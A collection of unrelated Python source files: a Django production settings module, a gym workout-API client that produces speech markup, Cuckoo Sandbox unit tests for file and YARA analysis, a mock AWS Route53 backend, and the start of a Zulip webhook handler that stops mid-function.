SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# SITE CONFIGURATION
# ------------------------------------------------------------------------------
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list('DJANGO_ALLOWED_HOSTS', default=['permabots.com'])
# END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
# STORAGE CONFIGURATION
# ------------------------------------------------------------------------------
# Uploaded Media Files
# ------------------------
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
AWS_ACCESS_KEY_ID = env('DJANGO_AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = env('DJANGO_AWS_SECRET_ACCESS_KEY')
AWS_STORAGE_BUCKET_NAME = env('DJANGO_AWS_STORAGE_BUCKET_NAME')
AWS_QUERYSTRING_AUTH = False
AWS_IS_GZIPPED = True
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIRY = 60 * 60 * 24 * 7
# TODO See: https://github.com/jschneier/django-storages/issues/47
# Revert the following and use str after the above-mentioned bug is fixed in
# either django-storage-redux or boto
AWS_HEADERS = {
'Cache-Control': six.b('max-age=%d, s-maxage=%d, must-revalidate' % (
AWS_EXPIRY, AWS_EXPIRY))
}
# URL that handles the media served from MEDIA_ROOT, used for managing
# stored files.
from storages.backends.s3boto import S3BotoStorage # noqa
StaticRootS3BotoStorage = lambda: S3BotoStorage(location='static')
MediaRootS3BotoStorage = lambda: S3BotoStorage(location='media')
DEFAULT_FILE_STORAGE = 'config.settings.production.MediaRootS3BotoStorage'
MEDIA_URL = 'https://%s.s3.amazonaws.com/media/' % AWS_STORAGE_BUCKET_NAME
# Static Assets
# ------------------------
STATIC_URL = 'https://%s.s3.amazonaws.com/static/' % AWS_STORAGE_BUCKET_NAME
STATICFILES_STORAGE = 'config.settings.production.StaticRootS3BotoStorage'
# See: https://github.com/antonagestam/collectfast
# For Django 1.7+, 'collectfast' should come before
# 'django.contrib.staticfiles'
AWS_PRELOAD_METADATA = True
INSTALLED_APPS = ('collectfast', ) + INSTALLED_APPS
# EMAIL
# ------------------------------------------------------------------------------
DEFAULT_FROM_EMAIL = env('DJANGO_DEFAULT_FROM_EMAIL',
default='permabots <noreply@permabots.com>')
EMAIL_BACKEND = 'django_mailgun.MailgunBackend'
MAILGUN_ACCESS_KEY = env('DJANGO_MAILGUN_API_KEY')
MAILGUN_SERVER_NAME = env('DJANGO_MAILGUN_SERVER_NAME')
EMAIL_SUBJECT_PREFIX = env("DJANGO_EMAIL_SUBJECT_PREFIX", default='[permabots] ')
SERVER_EMAIL = env('DJANGO_SERVER_EMAIL', default=DEFAULT_FROM_EMAIL)
NEW_RELIC_LICENSE_KEY = env('NEW_RELIC_LICENSE_KEY')
NEW_RELIC_APP_NAME = env('NEW_RELIC_APP_NAME')
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See:
# https://docs.djangoproject.com/en/dev/ref/templates/api/#django.template.loaders.cached.Loader
TEMPLATES[0]['OPTIONS']['loaders'] = [
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ]),
]
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
DATABASES['default'] = env.db("DATABASE_URL")
# CACHING
# ------------------------------------------------------------------------------
# Heroku URL does not pass the DB number, so we parse it in
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "{0}/{1}".format(env('REDIS_URL', default="redis://127.0.0.1:6379"), 0),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"IGNORE_EXCEPTIONS": True, # mimics memcache behavior.
# http://niwinz.github.io/django-redis/latest/#_memcached_exceptions_behavior
}
}
}
# LOGGING CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s '
'%(process)d %(thread)d %(message)s'
},
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose',
},
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True
},
'django.security.DisallowedHost': {
'level': 'ERROR',
'handlers': ['console', 'mail_admins'],
'propagate': True
},
'permabots': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'permabots': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
}
}
# Custom Admin URL, use {% url 'admin:index' %}
ADMIN_URL = env('DJANGO_ADMIN_URL')
# Your production stuff: Below this line define 3rd party library settings
|
|
from urllib.request import urlopen
from urllib.parse import urlencode
from urllib.error import HTTPError
import json
import logging
from datetime import datetime, date as Date
import sys
import re
from typing import List, Iterator, Tuple, Optional
from . import env
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.DEBUG)
URL = 'http://www.elliottbaycrossfit.com/api/v1/wods?'
def _is_announcement_line(line: str) -> bool:
"""
Is a line of text considered an announcement line?
Examples:
HAPPY BIRTHDAY <person>!!!!
NO CLASSES <>
:param line: line to check
:return: if the line matches an expected pattern
"""
return bool(line) and (line.upper() == line or line.endswith('!!'))
def _split_announcement_and_strength(strength_raw: Optional[str]) -> Tuple[List[str], List[str]]:
"""
Split the strength section into 2 sections: announcements and the actual
strength training workout.
Rohan sometimes starts the description of the strength training
section with an announcement, like wishing someone happy birthday
or announcing that a class is canceled.
:param strength_raw: The raw strength text from the API
:return: 2-tuple with the strength and announcements split by line
"""
if strength_raw is None:
return [], []
strength_raw = strength_raw.strip()
if not strength_raw:
return [], []
announcement = []
lines = [l.strip() for l in strength_raw.splitlines(False)]
# while we have lines to parse (whole strength can be an announcement)
# and the line is an announcement line or empty line (multiple announcements
# can be split by an empty line)
while lines and (_is_announcement_line(lines[0]) or not lines[0]):
announcement.append(lines.pop(0))
return announcement, lines
def _get_conditioning(conditioning_raw: Optional[str]) -> List[str]:
"""safely gets the conditioning part of the workout"""
if conditioning_raw is None:
return []
return conditioning_raw.strip().splitlines(False)
class WOD(object):
"""
Class representing a WOD from the EBCF API.
"""
def __init__(self, wod_attributes: dict):
self.announcement_lines, self.strength_lines = _split_announcement_and_strength(
wod_attributes.get('strength', '')
)
self.conditioning_lines = _get_conditioning(wod_attributes.get('conditioning', ''))
self.image = wod_attributes.get('image', None)
self.datetime = _safe_datetime(wod_attributes.get('date'))
self.date = None
if self.datetime:
self.date = self.datetime.date()
self.publish_datetime = _safe_datetime(wod_attributes.get('publishDate'))
def has_content(self) -> bool:
return bool(self.announcement_lines or self.conditioning_lines or self.strength_lines)
def announcement_ssml(self) -> str:
if self.announcement_lines:
ssml_chunks = ['<p>Announcement:']
for line in self.announcement_lines:
line = line.strip()
if line:
ssml_chunks.append('<s>{}</s>'.format(_clean_illegal_ssml_chars(line)))
else:
ssml_chunks.append('<break time="500ms"/>')
ssml_chunks.append('</p>')
return ''.join(ssml_chunks)
return ''
def announcement_pprint(self) -> str:
if self.announcement_lines:
return 'Announcement:\n' + '\n'.join(self.announcement_lines)
return ''
def strength_ssml(self) -> str:
if self.strength_lines:
return _convert_ssml(self.strength_lines, 'Strength Section:')
return ''
def strength_pprint(self) -> str:
if self.strength_lines:
return 'Strength:\n' + '\n'.join(self.strength_lines)
return ''
def conditioning_ssml(self) -> str:
if self.conditioning_lines:
return _convert_ssml(self.conditioning_lines, 'Conditioning:')
return ''
def conditioning_pprint(self) -> str:
if self.conditioning_lines:
return 'Conditioning:\n' + '\n'.join(self.conditioning_lines)
return ''
def full_ssml(self) -> str:
return self.announcement_ssml() + self.strength_ssml() + self.conditioning_ssml()
def pprint(self) -> str:
return '\n'.join([
self.announcement_pprint(),
self.strength_pprint(),
self.conditioning_pprint()
])
def as_wod_attributes(self) -> dict:
return {
'strength': self.strength_raw,
'conditioning': self.conditioning_raw,
'image': self.image,
'date': self.datetime.strftime(EBCF_API_TSTAMP_FMT),
'publishDate': self.publish_datetime.strftime(EBCF_API_TSTAMP_FMT)
}
class APIParseError(ValueError):
"""Thrown when the underlying expectations of the API stop working."""
def _urlencode_multilevel(obj: dict) -> str:
"""
EBCF uses PHP-style query args that support nested dictionaries.
E.g. we need to typically pass the following args to the API:
filter[simple][date]:2017-06-01T00:00:00.000Z
filter[simple][enabled]:True
and these need to be encoded.
"""
flattened_params = {}
def _flatten_obj(obj, parent_key):
sub_params = {}
if isinstance(obj, dict):
for child_key in obj:
encode_key = '{}[{}]'.format(parent_key, child_key)
sub_params[encode_key] = obj[child_key]
elif isinstance(obj, list):
for i, val in enumerate(obj):
encode_key = '{}[{}]'.format(parent_key, i)
sub_params[encode_key] = val
else:
flattened_params[parent_key] = obj
for k, v in sub_params.items():
_flatten_obj(v, k)
if isinstance(obj, dict):
for k, v in obj.items():
_flatten_obj(v, k)
return urlencode(flattened_params)
def _call_api(params: dict) -> dict:
LOG.debug('EBCF API params: %s', params)
query_url = URL + _urlencode_multilevel(params)
LOG.debug('HTTP GET %s', query_url)
try:
with urlopen(query_url) as f:
return json.load(f)
except HTTPError as http_error:
if http_error.code == 401:
# indicates that the wod is not yet released AFAIK
return {}
else:
raise
def _parse_wod_response(api_response: dict) -> Iterator[WOD]:
LOG.debug('EBCF API response: %s', api_response)
wod_list = api_response.get('data', [])
for wod_data in wod_list:
try:
wod = WOD(wod_data['attributes'])
if wod.has_content():
yield wod
except KeyError:
continue
EBCF_RANGE_STRF_FMT = '%Y-%m-%dT%H:%M:%S%z'
def get_wods_by_range(start_date: datetime, end_date: datetime) -> List[WOD]:
"""
Gets the WOD by publishDate range.
:param start_date: Start day
:param end_date: End day
:return: WOD
:rtype: WOD
"""
params = {'filter': {'simple': {
'publishDate': {
'$gt': start_date.strftime(EBCF_RANGE_STRF_FMT),
'$lt': end_date.strftime(EBCF_RANGE_STRF_FMT)
},
'enabled': True
}}}
return list(_parse_wod_response(_call_api(params)))
def get_wod(date: Date) -> WOD:
"""
gets the WOD for a specific day.
:param datetime.date date: the date
:returns: wod data or None if not found
:rtype: WOD
"""
params = {'filter': {'simple': {
'date': date.strftime('%Y-%m-%d') + 'T00:00:00.000Z',
'enabled': True
}}}
for wod in _parse_wod_response(_call_api(params)):
if wod.date == date:
return wod
_ALIASES = {
r'OH': r'<sub alias="overhead">OH</sub>',
r'DB': r'<sub alias="dumbbell">DB</sub>',
r'KB': r'<sub alias="kettlebell">KB</sub>',
r'EMOM': r'every minute on the minute',
r'E(\d)MOM': r'every \1 minutes on the minute',
r'HSPU': r'hand stand push ups',
r'#': r'<sub alias="pounds">#</sub>',
r'(\d+)"': r'\1<sub alias="inches">"</sub>',
r'(\d+)\'': r'\1<sub alias="feet">\'</sub>',
r'&': 'and',
r'(\d+) [Ss]ec\.? ': r'\1 second ',
r'\bT2B\b': r'<sub alias="toes to bar">T2B</sub>', # T2B => toes 2 bar
r'( ?)\bx ?(\b\d+\b)': r'\1times \2', # 'x3' or ' x 3' => times 3
r' \+ ': '<break strength="strong"/> + ', # slow down between plusses
}
def _inject_aliases(text: str) -> str:
for key, replacement in _ALIASES.items():
text = re.sub(key, replacement, text)
return text
def _fix_sets(text: str) -> str:
return re.sub(r'(\d+)x(\d+)', r'\1 sets of \2', text)
def _fix_rx(text: str) -> str:
return re.sub(r'(\d+[#"\'])/(\d+[#"\'])', r'<prosody rate="fast">\1 male, \2 female</prosody>', text)
def _clean_illegal_ssml_chars(text: str) -> str:
return text.replace('&', 'and')
def _massage_for_tts(text: str) -> str:
text = _fix_sets(text)
text = _fix_rx(text)
text = _inject_aliases(text)
return text
def _convert_ssml(lines: List[str], section: str) -> str:
section = '<p>%s</p>' % section
new_lines = [
'<s>{}</s>'.format(_massage_for_tts(l))
for l in lines
]
return section + ''.join(new_lines)
EBCF_API_TSTAMP_FMT = '%Y-%m-%dT%H:%M:%S.000Z'
def _safe_datetime(datestr: str) -> datetime:
"""Tries to convert a timestamp into a datetime object, without crashing.
:param datestr: date string
:returns: datetime object set to UTC or None
"""
if not datestr:
return None
try:
return env.UTC.localize(datetime.strptime(datestr, EBCF_API_TSTAMP_FMT))
except ValueError:
return None
def _test(argv: List[str]) -> None:
logging.basicConfig(format='%(levelname)s %(filename)s-%(funcName)s-%(lineno)d: %(message)s', level=logging.DEBUG)
try:
date = datetime.strptime(argv[1], '%Y-%m-%d').date()
except IndexError:
print('Must give me a date in format: YYYY-MM-DD')
sys.exit(1)
wod = get_wod(date)
if wod:
print(wod.pprint())
print('SSML:')
print(wod.full_ssml())
else:
print(wod)
if __name__ == '__main__':
_test(sys.argv)
|
|
# Copyright (C) 2012-2013 Claudio Guarnieri.
# Copyright (C) 2014-2018 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import os
import pytest
import re
import tempfile
from cuckoo.common.files import Files
from cuckoo.common.objects import (
Dictionary, File, Archive, Buffer, YaraMatch, URL_REGEX
)
from cuckoo.core.startup import init_yara
from cuckoo.main import cuckoo_create
from cuckoo.misc import set_cwd, cwd
from cuckoo.processing.static import PortableExecutable
class TestDictionary(object):
def setup_method(self, method):
self.d = Dictionary()
def test_usage(self):
self.d.a = "foo"
assert "foo" == self.d.a
self.d.a = "bar"
assert "bar" == self.d.a
def test_exception(self):
with pytest.raises(AttributeError):
self.d.b.a
class TestFile(object):
def setup(self):
# File() will invoke cwd(), so any CWD is required.
set_cwd(tempfile.mkdtemp())
self.path = tempfile.mkstemp()[1]
self.file = File(self.path)
def test_get_name(self):
assert self.path.split(os.sep)[-1] == self.file.get_name()
def test_get_data(self):
assert "" == self.file.get_data()
def test_get_size(self):
assert 0 == self.file.get_size()
def test_get_crc32(self):
assert "00000000" == self.file.get_crc32()
def test_get_md5(self):
assert "d41d8cd98f00b204e9800998ecf8427e" == self.file.get_md5()
def test_get_sha1(self):
assert "da39a3ee5e6b4b0d3255bfef95601890afd80709" == self.file.get_sha1()
def test_get_sha256(self):
assert "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" == self.file.get_sha256()
def test_get_sha512(self):
assert "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e" == self.file.get_sha512()
def test_get_ssdeep(self):
try:
import pydeep
assert self.file.get_ssdeep() is not None
pydeep # Fake usage.
except ImportError:
assert self.file.get_ssdeep() is None
def test_get_type(self):
assert "empty" in self.file.get_type()
def test_get_content_type(self):
assert self.file.get_content_type() in ["inode/x-empty", "application/x-empty"]
def test_get_all_type(self):
assert isinstance(self.file.get_all(), dict)
def test_get_all_keys(self):
for key in ["name", "size", "crc32", "md5", "sha1", "sha256", "sha512", "ssdeep", "type"]:
assert key in self.file.get_all()
class TestMagic(object):
def test_magic1(self):
f = File("tests/files/foo.txt")
assert "ASCII text" in f.get_type()
assert f.get_content_type() == "text/plain"
def test_magic2(self):
pe = PortableExecutable(None)
assert "ASCII text" in pe._get_filetype("hello world")
def test_magic3(self):
assert File(__file__).get_type().startswith((
"Python script", "ASCII ",
))
assert File(__file__).get_content_type() in (
"text/x-python", "text/plain",
)
@pytest.mark.skipif("sys.platform != 'linux2'")
def test_symlink_magic(self):
filepath = tempfile.mktemp()
os.symlink(__file__, filepath)
assert File(filepath).get_type().startswith("Python script")
assert File(filepath).get_content_type() == "text/x-python"
def test_regex():
r = re.findall(URL_REGEX, "foo http://google.com/search bar")
assert len(r) == 1
assert "".join(r[0]) == "http://google.com/search"
@pytest.mark.skipif("sys.platform != 'linux2'")
def test_m2crypto():
pe = PortableExecutable("tests/files/icardres.dll")
sig0 = pe.run()["signature"][0]
assert sig0["organization"] == "Microsoft Corporation"
assert sig0["sha1"] == "9e95c625d81b2ba9c72fd70275c3699613af61e3"
def test_yara_offsets():
set_cwd(tempfile.mkdtemp())
cuckoo_create()
init_yara()
buf = (
# The SSEXY payload as per vmdetect.yar
"66 0F 70 ?? ?? 66 0F DB ?? ?? ?? ?? "
"?? 66 0F DB ?? ?? ?? ?? ?? 66 0F EF "
# A VirtualBox MAC address.
"30 38 2d 30 30 2d 32 37"
)
filepath = Files.temp_put(
"A"*64 + buf.replace("??", "00").replace(" ", "").decode("hex")
)
assert File(filepath).get_yara() == [{
"meta": {
"description": "Possibly employs anti-virtualization techniques",
"author": "nex"
},
"name": "vmdetect",
"offsets": {
"ssexy": [
(64, 1),
],
"virtualbox_mac_1a": [
(88, 0),
],
},
"strings": [
"MDgtMDAtMjc=",
"Zg9wAABmD9sAAAAAAGYP2wAAAAAAZg/v",
],
}]
def test_yara_no_description():
set_cwd(tempfile.mkdtemp())
cuckoo_create()
open(cwd("yara", "binaries", "empty.yara"), "wb").write("""
rule EmptyRule {
condition:
1
}
rule DescrRule {
meta:
description = "this is description"
condition:
1
}
""")
init_yara()
a, b = File(Files.temp_put("hello")).get_yara()
assert a["name"] == "EmptyRule"
assert a["meta"] == {
"description": "(no description)",
}
assert b["name"] == "DescrRule"
assert b["meta"] == {
"description": "this is description",
}
def test_yara_externals():
set_cwd(tempfile.mkdtemp())
cuckoo_create()
open(cwd("yara", "office", "external.yara"), "wb").write("""
rule ExternalRule {
condition:
filename matches /document.xml/
}
""")
init_yara()
assert not File(Files.temp_put("")).get_yara("office")
assert not File(Files.temp_put("hello")).get_yara("office", {
"filename": "hello.jpg",
})
a, = File(Files.temp_put("hello")).get_yara("office", {
"filename": "document.xml",
})
assert a["name"] == "ExternalRule"
def test_get_urls():
filepath = Files.temp_put("""
http://google.com
google.com/foobar
thisisnotadomain
https://1.2.3.4:9001/hello
""")
assert sorted(File(filepath).get_urls()) == [
# TODO Why does this not work properly at my own machine?
"http://google.com",
"https://1.2.3.4:9001/hello",
]
class TestArchive(object):
def test_get_file(self):
a = Archive("tests/files/pdf0.zip")
assert a.get_file("files/pdf0.pdf").get_size() == 680
def test_not_temporary_file(self):
f = File("tests/files/pdf0.pdf")
assert os.path.exists("tests/files/pdf0.pdf")
del f
assert os.path.exists("tests/files/pdf0.pdf")
def test_temporary_file(self):
a = Archive("tests/files/pdf0.zip")
f = a.get_file("files/pdf0.pdf")
filepath = f.file_path
assert f.get_size() == 680
assert os.path.exists(filepath)
del f
assert not os.path.exists(filepath)
class TestBuffer(object):
def test_yara_quick(self):
set_cwd(tempfile.mkdtemp())
cuckoo_create()
init_yara()
buf = (
# The SSEXY payload as per vmdetect.yar
"66 0F 70 ?? ?? 66 0F DB ?? ?? ?? ?? "
"?? 66 0F DB ?? ?? ?? ?? ?? 66 0F EF "
)
contents = "A"*64 + buf.replace("??", "00").replace(" ", "").decode("hex")
assert Buffer(contents).get_yara_quick("binaries") == ["vmdetect"]
class TestPubPrivKeys(object):
def test_no_keys(self):
assert File("tests/files/pdf0.pdf").get_keys() == []
def test_pub_key(self):
buf = open("tests/files/pdf0.pdf", "rb").read()
filepath = Files.temp_put((
buf +
"-----BEGIN PUBLIC KEY-----\n"
"HELLOWORLD\n"
"-----END PUBLIC KEY-----" +
buf
))
assert File(filepath).get_keys() == [
"-----BEGIN PUBLIC KEY-----\n"
"HELLOWORLD\n"
"-----END PUBLIC KEY-----"
]
def test_private_key(self):
buf = open("tests/files/pdf0.pdf", "rb").read()
filepath = Files.temp_put((
buf +
"-----BEGIN RSA PRIVATE KEY-----\n"
"HELLOWORLD\n"
"-----END RSA PRIVATE KEY-----" +
buf
))
assert File(filepath).get_keys() == [
"-----BEGIN RSA PRIVATE KEY-----\n"
"HELLOWORLD\n"
"-----END RSA PRIVATE KEY-----"
]
class TestYaraMatch(object):
def test_basics(self):
ym = YaraMatch({
"name": "foo",
"meta": {},
"offsets": {
"a": [
(1, 0),
],
},
"strings": [
"bar".encode("base64"),
],
})
assert ym.string("a", 0) == "bar"
assert ym.string("a") == "bar"
def test_multiple(self):
ym = YaraMatch({
"name": "foo",
"meta": {},
"offsets": {
"a": [
(1, 0),
(2, 2),
],
"b": [
(3, 1),
],
},
"strings": [
"bar".encode("base64"),
"baz".encode("base64"),
"foo".encode("base64"),
],
})
assert ym.string("a", 0) == "bar"
assert ym.string("a", 1) == "foo"
assert ym.string("b", 0) == "baz"
assert ym.strings("a") == ["bar", "foo"]
assert ym.strings("b") == ["baz"]
|
|
from __future__ import unicode_literals
from collections import defaultdict
import uuid
from jinja2 import Template
from moto.core import BaseBackend, BaseModel
from moto.core.utils import get_random_hex
class HealthCheck(BaseModel):
def __init__(self, health_check_id, health_check_args):
self.id = health_check_id
self.ip_address = health_check_args.get("ip_address")
self.port = health_check_args.get("port", 80)
self._type = health_check_args.get("type")
self.resource_path = health_check_args.get("resource_path")
self.fqdn = health_check_args.get("fqdn")
self.search_string = health_check_args.get("search_string")
self.request_interval = health_check_args.get("request_interval", 30)
self.failure_threshold = health_check_args.get("failure_threshold", 3)
@property
def physical_resource_id(self):
return self.id
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']['HealthCheckConfig']
health_check_args = {
"ip_address": properties.get('IPAddress'),
"port": properties.get('Port'),
"type": properties['Type'],
"resource_path": properties.get('ResourcePath'),
"fqdn": properties.get('FullyQualifiedDomainName'),
"search_string": properties.get('SearchString'),
"request_interval": properties.get('RequestInterval'),
"failure_threshold": properties.get('FailureThreshold'),
}
health_check = route53_backend.create_health_check(health_check_args)
return health_check
def to_xml(self):
template = Template("""<HealthCheck>
<Id>{{ health_check.id }}</Id>
<CallerReference>example.com 192.0.2.17</CallerReference>
<HealthCheckConfig>
<IPAddress>{{ health_check.ip_address }}</IPAddress>
<Port>{{ health_check.port }}</Port>
<Type>{{ health_check._type }}</Type>
<ResourcePath>{{ health_check.resource_path }}</ResourcePath>
<FullyQualifiedDomainName>{{ health_check.fqdn }}</FullyQualifiedDomainName>
<RequestInterval>{{ health_check.request_interval }}</RequestInterval>
<FailureThreshold>{{ health_check.failure_threshold }}</FailureThreshold>
{% if health_check.search_string %}
<SearchString>{{ health_check.search_string }}</SearchString>
{% endif %}
</HealthCheckConfig>
<HealthCheckVersion>1</HealthCheckVersion>
</HealthCheck>""")
return template.render(health_check=self)
class RecordSet(BaseModel):
def __init__(self, kwargs):
self.name = kwargs.get('Name')
self._type = kwargs.get('Type')
self.ttl = kwargs.get('TTL')
self.records = kwargs.get('ResourceRecords', [])
self.set_identifier = kwargs.get('SetIdentifier')
self.weight = kwargs.get('Weight')
self.region = kwargs.get('Region')
self.health_check = kwargs.get('HealthCheckId')
self.hosted_zone_name = kwargs.get('HostedZoneName')
self.hosted_zone_id = kwargs.get('HostedZoneId')
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']
zone_name = properties.get("HostedZoneName")
if zone_name:
hosted_zone = route53_backend.get_hosted_zone_by_name(zone_name)
else:
hosted_zone = route53_backend.get_hosted_zone(
properties["HostedZoneId"])
record_set = hosted_zone.add_rrset(properties)
return record_set
@classmethod
def update_from_cloudformation_json(cls, original_resource, new_resource_name, cloudformation_json, region_name):
cls.delete_from_cloudformation_json(
original_resource.name, cloudformation_json, region_name)
return cls.create_from_cloudformation_json(new_resource_name, cloudformation_json, region_name)
@classmethod
def delete_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
# this will break if you changed the zone the record is in,
# unfortunately
properties = cloudformation_json['Properties']
zone_name = properties.get("HostedZoneName")
if zone_name:
hosted_zone = route53_backend.get_hosted_zone_by_name(zone_name)
else:
hosted_zone = route53_backend.get_hosted_zone(
properties["HostedZoneId"])
try:
hosted_zone.delete_rrset_by_name(resource_name)
except KeyError:
pass
@property
def physical_resource_id(self):
return self.name
def to_xml(self):
template = Template("""<ResourceRecordSet>
<Name>{{ record_set.name }}</Name>
<Type>{{ record_set._type }}</Type>
{% if record_set.set_identifier %}
<SetIdentifier>{{ record_set.set_identifier }}</SetIdentifier>
{% endif %}
{% if record_set.weight %}
<Weight>{{ record_set.weight }}</Weight>
{% endif %}
{% if record_set.region %}
<Region>{{ record_set.region }}</Region>
{% endif %}
<TTL>{{ record_set.ttl }}</TTL>
<ResourceRecords>
{% for record in record_set.records %}
<ResourceRecord>
<Value>{{ record }}</Value>
</ResourceRecord>
{% endfor %}
</ResourceRecords>
{% if record_set.health_check %}
<HealthCheckId>{{ record_set.health_check }}</HealthCheckId>
{% endif %}
</ResourceRecordSet>""")
return template.render(record_set=self)
def delete(self, *args, **kwargs):
''' Not exposed as part of the Route 53 API - used for CloudFormation. args are ignored '''
hosted_zone = route53_backend.get_hosted_zone_by_name(
self.hosted_zone_name)
if not hosted_zone:
hosted_zone = route53_backend.get_hosted_zone(self.hosted_zone_id)
hosted_zone.delete_rrset_by_name(self.name)
class FakeZone(BaseModel):
def __init__(self, name, id_, private_zone, comment=None):
self.name = name
self.id = id_
if comment is not None:
self.comment = comment
self.private_zone = private_zone
self.rrsets = []
def add_rrset(self, record_set):
record_set = RecordSet(record_set)
self.rrsets.append(record_set)
return record_set
def upsert_rrset(self, record_set):
new_rrset = RecordSet(record_set)
for i, rrset in enumerate(self.rrsets):
if rrset.name == new_rrset.name:
self.rrsets[i] = new_rrset
break
else:
self.rrsets.append(new_rrset)
return new_rrset
def delete_rrset_by_name(self, name):
self.rrsets = [
record_set for record_set in self.rrsets if record_set.name != name]
def delete_rrset_by_id(self, set_identifier):
self.rrsets = [
record_set for record_set in self.rrsets if record_set.set_identifier != set_identifier]
def get_record_sets(self, type_filter, name_filter):
record_sets = list(self.rrsets) # Copy the list
if type_filter:
record_sets = [
record_set for record_set in record_sets if record_set._type == type_filter]
if name_filter:
record_sets = [
record_set for record_set in record_sets if record_set.name == name_filter]
return record_sets
@property
def physical_resource_id(self):
return self.name
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']
name = properties["Name"]
hosted_zone = route53_backend.create_hosted_zone(
name, private_zone=False)
return hosted_zone
class RecordSetGroup(BaseModel):
def __init__(self, hosted_zone_id, record_sets):
self.hosted_zone_id = hosted_zone_id
self.record_sets = record_sets
@property
def physical_resource_id(self):
return "arn:aws:route53:::hostedzone/{0}".format(self.hosted_zone_id)
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']
zone_name = properties.get("HostedZoneName")
if zone_name:
hosted_zone = route53_backend.get_hosted_zone_by_name(zone_name)
else:
hosted_zone = route53_backend.get_hosted_zone(properties["HostedZoneId"])
record_sets = properties["RecordSets"]
for record_set in record_sets:
hosted_zone.add_rrset(record_set)
record_set_group = RecordSetGroup(hosted_zone.id, record_sets)
return record_set_group
class Route53Backend(BaseBackend):
def __init__(self):
self.zones = {}
self.health_checks = {}
self.resource_tags = defaultdict(dict)
def create_hosted_zone(self, name, private_zone, comment=None):
new_id = get_random_hex()
new_zone = FakeZone(
name, new_id, private_zone=private_zone, comment=comment)
self.zones[new_id] = new_zone
return new_zone
def change_tags_for_resource(self, resource_id, tags):
if 'Tag' in tags:
if isinstance(tags['Tag'], list):
for tag in tags['Tag']:
self.resource_tags[resource_id][tag['Key']] = tag['Value']
else:
key, value = (tags['Tag']['Key'], tags['Tag']['Value'])
self.resource_tags[resource_id][key] = value
else:
if 'Key' in tags:
if isinstance(tags['Key'], list):
for key in tags['Key']:
del(self.resource_tags[resource_id][key])
else:
del(self.resource_tags[resource_id][tags['Key']])
def list_tags_for_resource(self, resource_id):
if resource_id in self.resource_tags:
return self.resource_tags[resource_id]
def get_all_hosted_zones(self):
return self.zones.values()
def get_hosted_zone(self, id_):
return self.zones.get(id_.replace("/hostedzone/", ""))
def get_hosted_zone_by_name(self, name):
for zone in self.get_all_hosted_zones():
if zone.name == name:
return zone
def delete_hosted_zone(self, id_):
return self.zones.pop(id_.replace("/hostedzone/", ""), None)
def create_health_check(self, health_check_args):
health_check_id = str(uuid.uuid4())
health_check = HealthCheck(health_check_id, health_check_args)
self.health_checks[health_check_id] = health_check
return health_check
def get_health_checks(self):
return self.health_checks.values()
def delete_health_check(self, health_check_id):
return self.health_checks.pop(health_check_id, None)
route53_backend = Route53Backend()
|
|
from __future__ import absolute_import
from functools import partial
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success
from zerver.decorator import api_key_only_webhook_view, REQ, has_request_variables
from zerver.lib.webhooks.git import get_push_commits_event_message, EMPTY_SHA,\
get_remove_branch_event_message, get_pull_request_event_message,\
get_issue_event_message, SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE,\
get_commits_comment_action_message, get_push_tag_event_message
from zerver.models import Client, UserProfile
from django.http import HttpRequest, HttpResponse
from typing import Dict, Any, Iterable, Optional, Text
class UnknownEventType(Exception):
pass
def get_push_event_body(payload):
# type: (Dict[str, Any]) -> Text
if payload.get('after') == EMPTY_SHA:
return get_remove_branch_event_body(payload)
return get_normal_push_event_body(payload)
def get_normal_push_event_body(payload):
# type: (Dict[str, Any]) -> Text
compare_url = u'{}/compare/{}...{}'.format(
get_repository_homepage(payload),
payload['before'],
payload['after']
)
commits = [
{
'sha': commit.get('id'),
'message': commit.get('message'),
'url': commit.get('url')
}
